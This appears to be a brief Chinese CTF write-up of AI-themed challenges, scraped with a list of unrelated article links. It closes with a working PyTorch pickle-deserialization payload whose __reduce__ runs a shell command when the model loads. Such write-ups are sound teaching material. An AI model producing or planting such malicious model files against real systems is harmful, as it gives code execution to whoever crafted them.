当前位置: 首页 > news >正文

【AI】2025 0x401新生交流赛 wp

目录

许哥的数字游戏

🤫歌的😡🔥

Aura JailBreak

明阳未许

🔥🌸 LittFlower: Fire Boom! 🌸🔥


许哥的数字游戏

就是用题目给的数据去训练个模型识别数字

先叫ai解读下附件内容

让ai根据数据集训练个模型

把题目交互方式告诉ai,写个解题脚本拿到flag

🤫歌的😡🔥

附件内容,一个是有火的图,一个是没火的图

还是让ai训练模型&写交互

拿到flag

Aura JailBreak

明阳未许

一样是ai秒了

🔥🌸 LittFlower: Fire Boom! 🌸🔥

import torch import torch.nn as nn from torchvision import models import builtins import os class MaliciousMobileNetV2(models.MobileNetV2): def __init__(self, num_classes=2): super().__init__(num_classes=num_classes) def __reduce__(self): state_dict = self.state_dict() fake_state_dict = state_dict.copy() if "classifier.1.weight" in fake_state_dict: del fake_state_dict["classifier.1.weight"] if "classifier.1.bias" in fake_state_dict: del fake_state_dict["classifier.1.bias"] cmd = "import os; os.system('cp /flag /app/static/flag.txt')" return (builtins.eval, ( "(exec(cmd), state_dict)[1]", {'cmd': cmd, 'state_dict': fake_state_dict} )) if __name__ == '__main__': model = MaliciousMobileNetV2(num_classes=2) save_path = 'evil.pth' print(f"正在生成 Payload: {save_path} ...") torch.save(model, save_path) print("生成成功!")

上传脚本生成的.pth文件,加载模型触发pickle反序列化RCE拿到flag

http://www.zskr.cn/news/112447.html

相关文章:

  • GEE训练教程:利用 Google Earth Engine 分析广州地区植被动态变化(2016-2025)
  • 如何快速批量下载播客节目:终极免费工具完整指南
  • HTML5配合AES加密实现大文件分块传输安全?
  • 00 后只想一句话说清楚,50 后非要一套 OA 流程走完:到底谁在拖谁后腿?
  • 抖音直播永久保存指南:3分钟搞定高清回放下载
  • 移动端AI绘图革命:iPhone秒级生图技术深度解析
  • Android16音频之设置首选设备AudioTrack.setPreferredDevice:用法实例(一百五十五)
  • Debezium报错处理系列之第132篇:currentChangePosition=NULL(NULL)} as its LSN is NULL which is not expected
  • 网页前端如何通过JS实现大文件分块上传的进度条?
  • 互联网大厂Java面试:音视频场景下的技术栈深度解析
  • Android16之交叉编译系统压力测试利器:stress-ng(二百六十六)
  • LobeChat能否支持播客生成?音频内容创作新模式
  • Motrix浏览器扩展:如何让你的下载速度提升300%?
  • Obsidian Style Settings 终极指南:如何快速自定义你的笔记界面
  • AI驱动的动态价值投资策略适应
  • 百度网盘解析:2025年最实用的下载限速终极解决方案
  • 同样是PPT模板网站,为啥使用PPT模板 大家都选择LFPPT
  • 应用页:专为电视与车机优化的轻量级应用管理解决方案
  • JavaScript for 循环详解
  • 20、Mozilla 开发中的脚本、数据结构与数据库支持
  • LobeChat支持哪些大模型?一文看懂全兼容列表
  • 21、Mozilla数据库与文件格式详解
  • 终极指南:免费部署Llama-2-7b-chat-hf打造企业级AI助手
  • 别再只知道 UUID 了!分布式 ID 生成方案大盘点与 Java 实现
  • 22、Mozilla开发中的环境与文件处理
  • 16、深入探索XBL绑定:增强用户界面开发的利器
  • 17、探索 Mozilla 的 XPCOM 对象
  • 3大实用技巧深度解析:BetterNCM安装器故障排查与性能优化指南
  • Chrome搜索替换插件终极指南:免费高效的网页文本批量处理神器
  • springboot 项目 从jdk 8 升级到jdk21 会面临哪些问题